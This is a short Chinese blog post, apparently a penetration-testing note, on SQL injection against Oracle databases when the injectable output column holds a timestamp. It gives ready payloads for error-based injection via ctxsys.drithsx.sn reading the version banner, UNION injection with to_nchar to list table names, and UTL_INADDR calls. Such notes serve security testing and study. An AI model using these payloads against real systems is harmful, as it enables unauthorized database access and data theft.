当前位置:网站首页>对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)
对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)
2022-07-31 05:10:00 【不习惯有你】
注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关。
解决方法:
1.盲注
2.尝试报错注入
and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))
3.尝试去转化类型
to_nchar 转化为varchar或varchar2类型
用法to_nchar(table_name)
and 1=2 union select null,null,to_nchar(table_name),null from user_tables
4.通过函数对字符处理转化为数字
切割字符串,转数字看回显
由于有字数要求,我看了一些其他的报错函数
1.UTL_INADDR.get_host_address环境中IP地址
具体用法:select UTL_INADDR.get_host_address('www.qq.com') from dual;
2.UTL_INADDR.get_host_name返回环境中主机名
具体用法:
返回局域网内指定IP地址的主机名
select UTL_INADDR.get_host_name('192.168.0.156') from dual;
返回intrenet中指定IP地址的网址
select UTL_INADDR.get_host_name('219.153.50.84') from dual;
可以查看相关的内容Oracle显错注入函数_小明哥哥的技术博客_51CTO博客
边栏推荐
猜你喜欢
Redis 事务学习有感
Redis Advanced - Cache Issues: Consistency, Penetration, Penetration, Avalanche, Pollution, etc.
剑指offer专项突击版 --- 第 4 天
leetcode-每日一题565. 数组嵌套(标记图和并查集)
剑指offer专项突击版 --- 第 3 天
剑指offer基础版 ---- 第27天
![[mysql improves query efficiency] Mysql database query is slow to solve the problem](/img/fa/502a2efdd37508f15541558851a254.png)
[mysql improves query efficiency] Mysql database query is slow to solve the problem
Quickly master concurrent programming --- the basics
Why use Flink and how to get started with Flink?
MySQL (updating)
随机推荐
MySQL (updating)
leetcode-829. 连续整数求和(数论)
Three-party login using wallet Metamask based on web3.0
【C语言趣味小游戏——猜数字】
uni-app进阶之内嵌应用【day14】
[Introduction to MySQL 8 to Mastery] Basics - silent installation of MySQL on Linux system, cross-version upgrade
The TOKEN value of Kubernetes joining the cluster expires
07 【内置指令 自定义指令】
The interviewer asked me how to divide the database and the table?Fortunately, I summed up a set of eight-part essays
闭包(三)----执行环境
基于flask的三方登陆的流程
leetcode-438. 找到字符串中所有字母异位词(滑动窗口)
Memcached :安装
Interviewer, don't ask me to shake hands three times and wave four times again
关于LocalDateTime的全局返回时间带“T“的时间格式处理
leetcode-1833. 雪糕的最大数量(排序+贪心)
tf.keras.utils.get_file()
数据集划分以及交叉验证法
数据库上机实验1 数据库定义语言
数据库上机实验4 数据更新和视图